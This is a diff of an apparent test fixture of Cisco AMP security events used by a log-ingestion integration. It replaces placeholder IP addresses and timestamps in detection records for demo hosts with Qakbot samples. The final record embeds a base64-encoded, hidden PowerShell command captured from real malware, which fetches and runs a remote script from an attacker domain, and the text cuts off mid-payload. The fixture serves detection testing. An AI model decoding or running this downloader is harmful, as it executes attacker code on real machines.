+1979,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1989,8 +1989,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798707293Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:47.010762700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2010,7 +2010,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2055,7 +2055,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2065,8 +2065,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798709557Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:47.010767300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2086,7 +2086,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2133,7 +2133,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2147,8 +2147,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798711839Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:47.010771200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2170,7 +2170,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2213,7 +2213,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2227,8 +2227,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798714088Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:47.010775500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2250,7 +2250,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2297,7 +2297,7 @@ "f5a171c879b90e77861daf19741b373646d791ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2311,8 +2311,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798716338Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", + "ingested": "2021-12-09T13:35:47.010780800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2334,7 +2334,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2381,7 +2381,7 @@ "92673dd0e5f4a094fa6cd57bb301f884f2289f6c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2395,8 +2395,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798718576Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}", + "ingested": "2021-12-09T13:35:47.010785200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2418,7 +2418,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2451,7 +2451,7 @@ "Demo_BP_WMIPRVSE" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2470,8 +2470,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798720929Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQ